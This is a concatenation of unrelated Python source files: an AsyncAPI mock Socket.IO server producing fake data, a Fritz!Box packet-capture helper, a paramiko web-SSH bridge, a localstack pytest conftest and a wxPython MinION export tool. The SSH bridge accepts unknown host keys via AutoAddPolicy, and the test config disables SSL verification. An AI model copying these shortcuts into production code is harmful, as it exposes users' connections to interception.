* Periodically emits events containing payloads of fake data,
through tasks running on the background.
* Listens for all events defined in the given AsyncAPI specification,
returning fake acknowledgmentds where applicable.
"""
import threading
from functools import partial
from pathlib import Path
from queue import Queue
from random import choice
from typing import Callable
from typing import Mapping
from typing import MutableSequence
from typing import Optional
from typing import Sequence
from faker import Faker
from faker.exceptions import UnsupportedFeature
from flask import Flask
from hypothesis import HealthCheck
from hypothesis import Phase
from hypothesis import Verbosity
from hypothesis import given
from hypothesis import settings
from hypothesis.strategies import SearchStrategy
from hypothesis.strategies import sampled_from
from hypothesis_jsonschema import from_schema
from hypothesis_jsonschema._from_schema import STRING_FORMATS
from asynction.security import security_handler_factory
from asynction.server import AsynctionSocketIO
from asynction.server import _noop_handler
from asynction.types import AsyncApiSpec
from asynction.types import ErrorHandler
from asynction.types import JSONMapping
from asynction.types import JSONSchema
from asynction.types import Message
from asynction.types import SecurityRequirement
from asynction.validation import bindings_validator_factory
from asynction.validation import publish_message_validator_factory
CustomFormats = Mapping[str, SearchStrategy[str]]
def make_faker_formats(faker: Faker, sample_size: int) -> CustomFormats:
custom_formats: CustomFormats = {}
if sample_size < 1:
return custom_formats
for attr in dir(faker):
if (
not attr.startswith("_")
and attr not in Faker.generator_attrs
and attr not in STRING_FORMATS
):
try:
provider = getattr(faker, attr)
if isinstance(provider(), str):
custom_formats = {
**custom_formats,
attr: sampled_from([provider() for _ in range(sample_size)]),
}
except (TypeError, UnsupportedFeature):
# Skip legacy providers or providers that require extra dependencies
continue
return custom_formats
def generate_fake_data_from_schema(
schema: JSONSchema,
custom_formats: CustomFormats,
) -> JSONMapping:
strategy = from_schema(schema, custom_formats=custom_formats) # type: ignore
@given(strategy)
@settings(
database=None,
max_examples=30,
deadline=None,
verbosity=Verbosity.quiet,
phases=(Phase.generate,),
suppress_health_check=HealthCheck.all(),
)
def example_generating_inner_function(ex):
examples.append(ex)
examples: MutableSequence[JSONMapping] = []
example_generating_inner_function()
return choice(examples)
SubscriptionTask = Callable[[], None]
def task_runner(queue: "Queue[SubscriptionTask]") -> None:
while True:
task = queue.get()
task()
queue.task_done()
def task_scheduler(
tasks: Sequence[SubscriptionTask],
queue: "Queue[SubscriptionTask]",
sleep: Callable[[], None],
) -> None:
while True:
for task in tasks:
queue.put(task)
sleep()
class MockAsynctionSocketIO(AsynctionSocketIO):
"""Inherits the :class:`AsynctionSocketIO` class."""
def __init__(
self,
spec: AsyncApiSpec,
validation: bool,
docs: bool,
app: Optional[Flask],
custom_formats_sample_size: int,
**kwargs,
):
"""This is a private constructor.
Use the :meth:`MockAsynctionSocketIO.from_spec` factory instead.
"""
super().__init__(spec, validation=validation, docs=docs, app=app, **kwargs)
self.faker = Faker()
self.custom_formats = make_faker_formats(self.faker, custom_formats_sample_size)
self._subscription_tasks: Sequence[SubscriptionTask] = []
@classmethod
def from_spec(
cls,
spec_path: Path,
validation: bool = True,
server_name: Optional[str] = None,
docs: bool = True,
default_error_handler: Optional[ErrorHandler] = None,
app: Optional[Flask] = None,
custom_formats_sample_size: int = 20,
**kwargs,
) -> "MockAsynctionSocketIO":
"""Create a Flask-SocketIO mock server given an AsyncAPI spec.
The server emits events containing payloads of fake data in regular intervals,
through background subscription tasks.
It also listens for events as per the spec definitions
and returns mock aknowledgements where applicable.
All event and acknowledgment payloads adhere to the schemata defined
within the AsyncAPI spec.
In addition to the args and kwargs of :meth:`AsynctionSocketIO.from_spec`,
this factory method accepts some extra keyword arguments:
* ``custom_formats_sample_size``
:param spec_path: The path where the AsyncAPI YAML specification is located.
:param validation: When set to ``False``, message payloads, channel
bindings and ack callbacks are NOT validated.
Defaults to ``True``.
:param server_name: The server to pick from the AsyncAPI ``servers`` object.
The server object is then used to configure
the path ``kwarg`` of the SocketIO server.
:param docs: When set to ``True``, HTML rendered documentation is generated
and served through the ``GET {base_path}/docs`` route of the app.
The ``GET {base_path}/docs/asyncapi.json`` route is also exposed,
returning the raw specification data for programmatic retrieval.
Defaults to ``True``.
:param default_error_handler: The error handler that handles any namespace
without an explicit error handler.
Equivelant of ``@socketio.on_error_default``
:param app: The flask application instance. Defaults to ``None``.
:param custom_formats_sample_size: The ammout of the Faker provider samples
to be used for each custom string format.
Hypotheses uses these samples to generate
fake data. Set to ``0`` if custom formats
are not needed.
Defaults to ``20``.
:param kwargs: Flask-SocketIO, Socket.IO and Engine.IO server options.
:returns: A Flask-SocketIO mock server, emitting events of fake data in
regular intervals.
The server also has mock event and error handlers registered.
Example::
mock_asio = MockAsynctionSocketIO.from_spec(
spec_path="./docs/asyncapi.yaml",
app=flask_app,
# any other kwarg that the flask_socketio.SocketIO constructor accepts
)
"""
return super().from_spec(
spec_path,
validation=validation,
server_name=server_name,
docs=docs,
default_error_handler=default_error_handler,
app=app,
custom_formats_sample_size=custom_formats_sample_size,
**kwargs,
)
def _register_handlers(
self,
server_security: Sequence[SecurityRequirement] = (),
default_error_handler: Optional[ErrorHandler] = None,
) -> None:
for namespace, channel in self.spec.channels.items():
if channel.publish is not None:
for message in channel.publish.message.oneOf:
handler = self.make_publish_handler(message)
if self.validation:
with_payload_validation = publish_message_validator_factory(
message=message
)
handler = with_payload_validation(handler)
self.on_event(message.name, handler, namespace)
if channel.subscribe is not None:
self._subscription_tasks = [
*self._subscription_tasks,
*[
self.make_subscription_task(message, namespace)
for message in channel.subscribe.message.oneOf
],
]
connect_handler = _noop_handler
if self.validation:
with_bindings_validation = bindings_validator_factory(channel.bindings)
connect_handler = with_bindings_validation(connect_handler)
security = (
channel.x_security
if channel.x_security is not None
else server_security
)
if security:
# create a security handler wrapper
with_security = security_handler_factory(
security,
self.spec.components.security_schemes,
)
# apply security
connect_handler = with_security(connect_handler)
if connect_handler is not _noop_handler:
self.on_event("connect", connect_handler, namespace)
if default_error_handler is not None:
self.on_error_default(default_error_handler)
def make_subscription_task(
self, message: Message, namespace: str
) -> SubscriptionTask:
def task() -> None:
self.emit(
message.name,
generate_fake_data_from_schema(
message.payload or {"type": "null"}, self.custom_formats
),
namespace=namespace,
callback=message.x_ack and _noop_handler,
)
return task
def make_publish_handler(self, message: Message) -> Callable:
if message.x_ack is not None:
def handler(*args, **kwargs):
return generate_fake_data_from_schema(
message.x_ack.args, self.custom_formats
)
return handler
return _noop_handler
def start_background_task(
self, target: Callable, *args, **kwargs
) -> threading.Thread:
# The tasks created in the :meth:`MockAsynctionSocketIO.run` method below
# (both runner and scheduler) MUST be daemonic.
# However, python-engineio does not support daemonic background tasks,
# unless the chosen async mode defaults to some daemon-like behaviour.
# Native threads have daemon set to False by default, which is rather
# inconvinient for this use case.
# See the relevant issue:
# https://github.com/miguelgrinberg/python-engineio/issues/244
#
# The current method is a hack that accounts for the threading scenario,
# to ensure that native threads are started as daemons.
if self.async_mode == "threading":
th = threading.Thread(target=target, args=args, kwargs=kwargs, daemon=True)
th.start()
return th
return super().start_background_task(target, *args, **kwargs)
def run(
self,
app: Flask,
host: Optional[str] = None,
port: Optional[int] = None,
subscription_task_interval: float = 1.0,
max_worker_number: int = 8,
**kwargs,
) -> None:
"""
Run the mock Asynction SocketIO web server.
In addition to the args and kwargs of :meth:`flask_socketio.SocketIO.run`,
this method accepts some extra keyword arguments:
* ``subscription_task_interval``
* ``max_worker_number``
:param app: The flask application instance.
:param host: The hostname or IP address for the server to listen on.
Defaults to ``127.0.0.1``.
:param port: The port number for the server to listen on. Defaults to
``5000``.
:param subscription_task_interval: How often (in seconds) a subscription task
(thread that emits an event to
a connected client) is scheduled.
Defaults to ``1.0``.
:param max_worker_number: The maximum number of workers to be started for the
purposes of executing background subscription tasks.
Defaults to ``8``.
:param kwargs: Additional web server options that are propagated to
:meth:`flask_socketio.SocketIO.run`. The web server options
are specific to the server used in each of the supported
async modes. Refer to the Flask-SocketIO docs for details.
"""
queue: "Queue[SubscriptionTask]" = self.server.eio.create_queue()
for _ in range(min(max_worker_number, len(self._subscription_tasks))):
_ = self.start_background_task(task_runner, queue=queue)
_ = self.start_background_task(
task_scheduler,
tasks=self._subscription_tasks,
queue=queue,
sleep=partial(self.sleep, subscription_task_interval),
)
return super().run(app, host=host, port=port, **kwargs)
|
get_traffic.py
|
# coding=utf-8
from __future__ import unicode_literals, print_function
import os
import datetime
import threading
import requests
from django.conf import settings
from .fritz_browser import FritzBrowser
from ..models import DummyLogger, Capture
def get_traffic(num_seconds=10, browser=None, log=None):
if log is None:
log = DummyLogger()
if browser is None:
log.log("creating browser")
browser = FritzBrowser()
browser.open_capture()
# http://fritz.box/cgi-bin/capture_notimeout?sid=f92882de0cc85624&capture=Start&snaplen=1600&ifaceorminor=3-0
start_url = browser.get_capture_url()
stop_url = browser.get_capture_stop_url()
filepath = os.path.join(
settings.MEDIA_ROOT, "capture", "%s" % datetime.date.today()
)
if not os.path.exists(filepath):
os.makedirs(filepath)
now = datetime.datetime.now().replace(microsecond=0)
now_str = ("%s" % now).replace(":", "-").replace(" ", "-")
short_filename = "%s.eth" % now_str
filename = os.path.join(filepath, short_filename)
thread = threading.Thread(target=lambda: _store_capture(start_url, filename, log))
log.log("starting capture thread")
thread.start()
browser.sleep(num_seconds)
requests.get(stop_url)
if thread.is_alive():
thread.join()
Capture.objects.create(
date=now,
seconds=num_seconds,
filename=short_filename,
size=os.path.getsize(filename),
)
return
table = browser.driver.find_element_by_css_selector("table.zebra")
trs = table.find_elements_by_tag_name("tr")
for tr in trs:
#if "1. Internetverbindung" in tr.text:
if "Routing-Schnittstelle" in tr.text:
start_button = tr.find_element_by_css_selector('button[name="start"]')
thread = threading.Thread(target=lambda: _store_capture(start_url, filename, log))
log.log("starting capture thread")
thread.start()
log.log("waiting")
browser.sleep(4)
log.log("stopping")
stop_button = tr.find_element_by_css_selector('button[name="stop"]')
stop_button.click()
#requests.get(stop_url)
if thread.is_alive():
thread.join()
def _store_capture(url, filename, log):
res = requests.get(url)
with open(filename, b"wb") as f:
f.write(res.content)
log.log("stored %s bytes" % len(res.content))
|
webssh_connection.py
|
import json
import socket
from threading import Thread
import paramiko
class SSH:
def __init__(self, websocket, message):
self.websocket = websocket
self.message = message
self.channel = None
def connect(self, host, user, password=None, port=22, timeout=30, term='xterm', pty_width=80, pty_height=24,
private_key=''):
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if private_key:
pkey = paramiko.RSAKey.from_private_key_file(private_key)
ssh_client.connect(hostname=host, port=port, username=user, pkey=pkey)
else:
ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
transport = ssh_client.get_transport()
self.channel = transport.open_session()
self.channel.get_pty(term=term, width=pty_width, height=pty_height)
self.channel.invoke_shell()
for i in range(2):
recv = self.channel.recv(1024).decode('utf-8')
self.websocket.send(recv)
except socket.timeout:
message = 'ssh 连接超时'
self.websocket.send(message)
self.close()
except Exception as e:
print(e)
self.close()
def resize_pty(self, cols, rows):
self.channel.resize_pty(width=cols, height=rows)
def django_to_ssh(self, data):
try:
self.channel.send(data)
except Exception as e:
print(e)
self.close()
def websocket_to_django(self, data):
self.channel.send(data)
try:
while True:
data = self.channel.recv(1024).decode('utf-8')
if not len(data):
return
self.websocket.send(data)
except Exception as e:
print(e)
self.close()
def close(self):
self.message['status'] = 1
self.message['message'] = 'Close Connection'
message = json.dumps(self.message)
self.websocket.send(message)
self.websocket.close()
def shell(self, data):
Thread(target=self.websocket_to_django, args=(data,)).start()
|
conftest.py
|
"""
Pytest configuration that spins up a single localstack instance that is shared across test modules.
See: https://docs.pytest.org/en/6.2.x/fixture.html#conftest-py-sharing-fixtures-across-multiple-files
It is thread/process safe to run with pytest-parallel, however not for pytest-xdist.
"""
import logging
import multiprocessing as mp
import os
import threading
import pytest
from localstack import config
from localstack.constants import ENV_INTERNAL_TEST_RUN
from localstack.services import infra
from localstack.utils.analytics.profiler import profiled
from localstack.utils.common import safe_requests
from tests.integration.test_terraform import TestTerraform
logger = logging.getLogger(__name__)
localstack_started = mp.Event() # event indicating whether localstack has been started
localstack_stop = mp.Event() # event that can be triggered to stop localstack
localstack_stopped = mp.Event() # event indicating that localstack has been stopped
startup_monitor_event = mp.Event() # event that can be triggered to start localstack
will_run_terraform_tests = mp.Event() # flag to indicate that terraform should be initialized
@pytest.hookimpl()
def pytest_configure(config):
# first pytest lifecycle hook
_start_monitor()
def pytest_runtestloop(session):
# second pytest lifecycle hook (before test runner starts)
for item in session.items:
# set flag that terraform will be used
if 'terraform' in str(item.parent).lower():
will_run_terraform_tests.set()
break
if not session.items:
return
if session.config.option.collectonly:
return
# trigger localstack startup in startup_monitor and wait until it becomes ready
startup_monitor_event.set()
localstack_started.wait()
@pytest.hookimpl()
def pytest_unconfigure(config):
# last pytest lifecycle hook (before pytest exits)
_trigger_stop()
def _start_monitor():
threading.Thread(target=startup_monitor).start()
def _trigger_stop():
localstack_stop.set()
startup_monitor_event.set()
def startup_monitor() -> None:
"""
The startup monitor is a thread that waits for the startup_monitor_event and, once the event is true, starts a
localstack instance in it's own thread context.
"""
logger.info('waiting on localstack_start signal')
startup_monitor_event.wait()
if localstack_stop.is_set():
# this is called if _trigger_stop() is called before any test has requested the localstack_runtime fixture.
logger.info('ending startup_monitor')
localstack_stopped.set()
return
logger.info('running localstack')
run_localstack()
def run_localstack():
"""
Start localstack and block until it terminates. Terminate localstack by calling _trigger_stop().
"""
# configure
os.environ[ENV_INTERNAL_TEST_RUN] = '1'
safe_requests.verify_ssl = False
config.FORCE_SHUTDOWN = False
config.EDGE_BIND_HOST = '0.0.0.0'
def watchdog():
logger.info('waiting stop event')
localstack_stop.wait() # triggered by _trigger_stop()
logger.info('stopping infra')
infra.stop_infra()
def start_profiling(*args):
if not config.USE_PROFILER:
return
@profiled()
def profile_func():
# keep profiler active until tests have finished
localstack_stopped.wait()
print('Start profiling...')
profile_func()
print('Done profiling...')
monitor = threading.Thread(target=watchdog)
monitor.start()
logger.info('starting localstack infrastructure')
infra.start_infra(asynchronous=True)
threading.Thread(target=start_profiling).start()
if will_run_terraform_tests.is_set():
logger.info('running terraform init')
# init terraform binary if necessary
TestTerraform.init_async()
logger.info('waiting for infra to be ready')
infra.INFRA_READY.wait() # wait for infra to start (threading event)
localstack_started.set() # set conftest inter-process Event
logger.info('waiting for shutdown')
try:
logger.info('waiting for watchdog to join')
monitor.join()
finally:
logger.info('ok bye')
localstack_stopped.set()
@pytest.fixture(scope='session', autouse=True)
def localstack_runtime():
"""
This is a dummy fixture. Each test requests the fixture, but it actually just makes sure that localstack is running,
blocks until localstack is running, or starts localstack the first time the fixture is requested.
It doesn't actually do anything but signal to the `startup_monitor` function.
"""
if localstack_started.is_set():
# called by all tests after the startup has completed and the initial tests are unblocked
yield
return
startup_monitor_event.set()
localstack_started.wait()
yield
return
|
nanoscp.py
|
#! python
import os, sys, glob, time
import threading, queue
import tarfile
import paramiko, socket
import re
import wx
import wx.lib
from wx.lib import intctrl
from watchdog.observers import Observer
from watchdog.events import RegexMatchingEventHandler
from watchdog.events import FileMovedEvent
# Handle file system events matching regex
class FileHandler(RegexMatchingEventHandler):
def __init__(self, regex=['.*'], notify=None):
super().__init__(regexes=regex, ignore_directories=True)
self.notify = notify
def on_any_event(self, event):
if not event.is_directory and self.notify and not isinstance(event, FileMovedEvent):
self.notify(event.src_path)
# Set with timestamp to retrieve items at least n seconds not touched
class TimedSet():
def __init__(self):
self.__data = dict()
self.__condition = threading.Condition()
def put(self, item):
with self.__condition:
self.__data[item] = time.time()
def get(self, t_wait=0):
items = []
t_now = time.time()
with self.__condition:
keys = list(self.__data.keys())
for key in keys:
if self.__data[key] + t_wait <= t_now:
del self.__data[key]
items.append(key)
return items
# Logger
class Log(list):
def __init__(self, **kwargs):
self.callbacks = []
return super().__init__(**kwargs)
def add_callback(self, callback):
self.callbacks.append(callback)
def append(self, object):
for callback in self.callbacks:
callback(object)
return super().append(object)
# Archive sets of files as tar balls
class FileArchiver():
def __init__(self, dst_path, name_prefix='', batch_size=4000, count_offset=0, log=Log()):
self.dst_path = dst_path
self.name_prefix = name_prefix
self.batch_size = batch_size
self.__current_count = count_offset
self.__data_queue = []
self.__archive_queue = []
self.__condition = threading.Condition()
self.__archive_worker = None
self.log = log
def __del__(self):
if self.__archive_worker:
self.stop()
def add(self, file_name):
with self.__condition:
self.__data_queue.append(file_name)
if len(self.__data_queue) >= self.batch_size:
self.__archive_queue.append(self.__data_queue[:self.batch_size])
del self.__data_queue[:self.batch_size]
self.__condition.notify_all()
def start(self):
if not self.__archive_worker:
self.__archive_worker = threading.Thread(target=self.__archiver__)
self.__archive_worker.start()
def stop(self, partial_write=True):
if self.__archive_worker:
with self.__condition:
if partial_write and len(self.__data_queue) > 0:
self.__archive_queue.append(self.__data_queue)
self.__archive_queue.append([])
self.__condition.notify_all()
self.__archive_worker.join()
self.__archive_worker = None
def __archiver__(self):
while True:
while len(self.__archive_queue) > 0:
with self.__condition:
batches = self.__archive_queue.copy()
self.__archive_queue.clear()
for batch in batches:
if not batch:
return # poison pill exit
try:
dst = os.path.join(self.dst_path, self.name_prefix + str(self.__current_count) + '.tar')
if os.path.isfile(dst):
self.log.append('[ERROR] File ' + dst + ' already exists, skiped writing')
continue
with tarfile.open(dst, 'w') as fp:
for f in batch:
fp.add(f, arcname=os.path.basename(f))
self.log.append('Archived ' + str(len(batch)) + ' files as ' + self.name_prefix + str(self.__current_count) + '.tar')
self.__current_count += 1
except FileExistsError as e:
self.log.append('[ERROR] File ' + self.name_prefix + str(self.__current_count) + '.tar' + ' already exists, output NOT written')
with self.__condition:
self.__condition.wait()
# SCP client
class SCP():
def __init__(self):
pass
# MinION Export Deamon app
class app_core():
def __init__(self, log=Log()):
self.source_path = ''
self.export_path = ''
self.batch_prefix = ''
# run
self.cell_id = 'FXX00000'
self.cell_type = 'FLO-MIN10X'
self.kit = 'None'
self.usr1 = ''
self.usr2 = ''
# ssh
# options
self.regex = '.*fast5$'
self.batch_size = 4000
self.batch_offset = 0
self.delay = 60
self.recursive = False
self.ignore_existing = False
self.watchdog = None
self.file_queue = None
self.archiver = None
self.log = log
def is_startable(self):
startable = True
try:
if not os.path.isdir(self.source_path):
startable = False
self.log.append('[ERROR] Source is not a directory')
if not os.path.isdir(self.export_path):
startable = False
self.log.append('[ERROR] Destination is not a directory')
if self.batch_size < 1:
startable = False
self.log.append('[ERROR] Batch size must be greater one')
except:
return False
return startable
def start_watchdog(self):
try:
self.archiver = FileArchiver(self.export_path, name_prefix=self.batch_prefix,
batch_size=self.batch_size, count_offset=self.batch_offset,
log=self.log)
self.archiver.start()
self.file_queue = TimedSet()
self.watchdog = FileHandler(regex=[self.regex], notify=self.on_file_event)
self.observer = Observer()
self.observer.schedule(self.watchdog, path=self.source_path, recursive=self.recursive)
self.observer.start()
self.log.append('[INFO] Started File System Observer')
if not self.ignore_existing:
if self.recursive:
existing = [os.path.join(dirpath, f) for dirpath, _, files in os.walk(self.source_path) for f in files if re.match(self.regex, f)]
else:
existing = [os.path.join(self.source_path, f) for f in os.listdir(self.source_path) if re.match(self.regex, f)]
for ex in existing:
self.archiver.add(ex)
self.log.append('[INFO] Included ' + str(len(existing)) + ' existing files')
return True
except Exception as e:
self.log.append('[ERROR] Starting watchdog failed')
return False
def stop_watchdog(self):
try:
self.observer.stop()
self.observer.join()
for name in self.file_queue.get(t_wait=0):
if os.path.isfile(name):
self.archiver.add(name)
self.archiver.stop()
self.log.append('[INFO] Stopped File System Observer')
return True
except Exception as e:
self.log.append('[ERROR] Stoping Watchdog failed')
return False
def on_file_event(self, file_name):
self.file_queue.put(file_name)
for name in self.file_queue.get(t_wait=self.delay):
if os.path.isfile(name):
self.archiver.add(name)
# Main Window
class app_window(wx.Frame):
def __init__(self, parent, title):
# ensure the parent's __init__ is called
super(app_window, self).__init__(parent, title=title, size=(520,560), style=wx.CAPTION | wx.MINIMIZE_BOX |
wx.CLOSE_BOX | wx.RESIZE_BORDER | wx.CLIP_CHILDREN)
# init app class
self.log = Log()
self.log.add_callback(self.on_log)
self.app = app_core(log=self.log)
# create a menu bar
self.makeMenuBar()
self.initUI()
self.initEvents()
self.Show()
def makeMenuBar(self):
# Make a file menu with Hello and Exit items
fileMenu = wx.Menu()
# When using a stock ID we don't need to specify the menu item's label
exitItem = fileMenu.Append(wx.ID_EXIT)
# Now a help menu for the about item
helpMenu = wx.Menu()
aboutItem = helpMenu.Append(wx.ID_ABOUT)
# Main menu bar
menuBar = wx.MenuBar()
menuBar.Append(fileMenu, "&File")
menuBar.Append(helpMenu, "&Help")
# Give the menu bar to the frame
self.SetMenuBar(menuBar)
# Bind event handler
self.Bind(wx.EVT_MENU, self.on_exit, exitItem)
self.Bind(wx.EVT_MENU, self.on_about, aboutItem)
def initUI(self):
panel = wx.Panel(self)
sizer = wx.GridBagSizer(6, 5)
# Destination settings
dst_box = wx.StaticBox(panel, label="File System")
dst_sizer = wx.StaticBoxSizer(dst_box, wx.VERTICAL)
dst_grid = wx.GridBagSizer(3, 5)
lbl_Source = wx.StaticText(panel, label="Source")
self.txt_Source = wx.TextCtrl(panel)
self.btn_Source = wx.Button(panel, label="Browse...", size=(-1, 20), )
lbl_Destination = wx.StaticText(panel, label="Local/ Temp")
self.txt_Destination = wx.TextCtrl(panel)
self.btn_Destination = wx.Button(panel, label="Browse...", size=(-1, 20))
lbl_ssh_key = wx.StaticText(panel, label="SCP Key")
self.txt_ssh_key = wx.TextCtrl(panel)
self.btn_ssh_key = wx.Button(panel, label="Browse...", size=(-1, 20))
lbl_ssh_host = wx.StaticText(panel, label="SCP Host")
self.txt_ssh_host = wx.TextCtrl(panel)
lbl_username = wx.StaticText(panel, label="SCP User")
self.txt_ssh_user = wx.TextCtrl(panel)
lbl_password = wx.StaticText(panel, label="SCP Password")
self.txt_ssh_pw = wx.TextCtrl(panel, style=wx.TE_PASSWORD)
dst_grid.Add(lbl_Source, pos=(0,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.txt_Source, pos=(0,1), span=(1, 3), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.btn_Source, pos=(0,4), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(lbl_Destination, pos=(1,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.txt_Destination, pos=(1,1), span=(1, 3), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.btn_Destination, pos=(1,4), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(lbl_ssh_host, pos=(2,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.txt_ssh_host, pos=(2,1), span=(1, 1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(lbl_ssh_key, pos=(2,2), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.txt_ssh_key, pos=(2,3), span=(1, 1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.btn_ssh_key, pos=(2,4), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(lbl_username, pos=(3,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.txt_ssh_user, pos=(3,1), span=(1,1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(lbl_password, pos=(3,2), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.Add(self.txt_ssh_pw, pos=(3,3), span=(1,1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
dst_grid.AddGrowableCol(1)
dst_grid.AddGrowableCol(3)
dst_sizer.Add(dst_grid, flag=wx.EXPAND)
sizer.Add(dst_sizer, pos=(0, 0), span=(1, 5),
flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=0)
# Run params
run_box = wx.StaticBox(panel, label="Run")
run_sizer = wx.StaticBoxSizer(run_box, wx.VERTICAL)
run_grid = wx.GridSizer(3, 4, 5, 5)
lbl_cell_id = wx.StaticText(panel, label="Flo-Cell ID")
self.txt_cell_id = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.cell_id)
lbl_cell_type = wx.StaticText(panel, label="Flo-Cell Type")
self.txt_cell_type = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.cell_type)
lbl_kit = wx.StaticText(panel, label="Sequencing Kit")
self.txt_kit = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.kit)
lbl_usr1 = wx.StaticText(panel, label="User Field 1")
self.txt_usr1 = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.usr1)
lbl_usr2 = wx.StaticText(panel, label="User Field 2")
self.txt_usr2 = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.usr2)
run_grid.Add(lbl_cell_id, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
run_grid.Add(self.txt_cell_id)
run_grid.Add(lbl_usr1, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
run_grid.Add(self.txt_usr1)
run_grid.Add(lbl_cell_type, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
run_grid.Add(self.txt_cell_type)
run_grid.Add(lbl_usr2, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
run_grid.Add(self.txt_usr2)
run_grid.Add(lbl_kit, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
run_grid.Add(self.txt_kit)
run_sizer.Add(run_grid, flag=wx.EXPAND)
sizer.Add(run_sizer, pos=(1, 0), span=(1, 5),
flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=0)
# Options
opt_box = wx.StaticBox(panel, label="Options")
opt_sizer = wx.StaticBoxSizer(opt_box, wx.VERTICAL)
opt_grid = wx.GridSizer(4, 4, 5, 5)
self.chk_recursive = wx.CheckBox(panel, label="Recursive")
self.chk_igexist = wx.CheckBox(panel, label="Ignore Existing")
lbl_batch_size = wx.StaticText(panel, label="Batch size")
lbl_batch_offset = wx.StaticText(panel, label="Batch offset")
lbl_delay = wx.StaticText(panel, label="Delay")
self.int_batch_size = intctrl.IntCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.batch_size)
self.int_batch_offset = intctrl.IntCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.batch_offset)
self.int_delay = intctrl.IntCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.delay)
lbl_file_regex = wx.StaticText(panel, label="File regex")
lbl_batch_prefix = wx.StaticText(panel, label="Batch prefix")
self.txt_file_regex = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.regex)
self.txt_batch_prefix = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.batch_prefix)
opt_grid.Add(self.chk_recursive, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(self.chk_igexist, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(wx.StaticText(panel))
opt_grid.Add(wx.StaticText(panel))
opt_grid.Add(lbl_batch_size, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(self.int_batch_size, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(lbl_batch_offset, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(self.int_batch_offset, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(lbl_file_regex, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(self.txt_file_regex, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(lbl_batch_prefix, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(self.txt_batch_prefix, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(lbl_delay, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_grid.Add(self.int_delay, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
opt_sizer.Add(opt_grid, flag=wx.EXPAND)
sizer.Add(opt_sizer, pos=(2, 0), span=(1, 5),
flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=0)
# Log
self.txt_log = wx.TextCtrl(panel, style=wx.TE_MULTILINE)
self.txt_log.Disable()
sizer.Add(self.txt_log, pos=(3,0), span=(1,5), flag=wx.EXPAND, border=5)
# Flow Control
self.btn_Start = wx.Button(panel, label="Start")
sizer.Add(self.btn_Start, pos=(4, 3))
self.btn_Stop = wx.Button(panel, label="Stop")
self.btn_Stop.Disable()
sizer.Add(self.btn_Stop, pos=(4, 4), span=(1, 1),
flag=wx.BOTTOM|wx.RIGHT, border=5)
sizer.AddGrowableCol(2)
sizer.AddGrowableRow(3)
panel.SetSizer(sizer)
self.panel = panel
def initEvents(self):
self.Bind(wx.EVT_CLOSE, self.on_exit)
self.Bind(wx.EVT_BUTTON, self.on_source_browse, self.btn_Source)
self.Bind(wx.EVT_BUTTON, self.on_destination_browse, self.btn_Destination)
self.Bind(wx.EVT_BUTTON, self.on_key_browse, self.btn_ssh_key)
self.Bind(wx.EVT_BUTTON, self.on_start_click, self.btn_Start)
self.Bind(wx.EVT_BUTTON, self.on_stop_click, self.btn_Stop)
def on_exit(self, event):
self.on_stop_click(None)
self.Destroy()
def on_about(self, event):
wx.MessageBox("Export MinION reads in batches to remote location.",
"MinION Export Deamon",
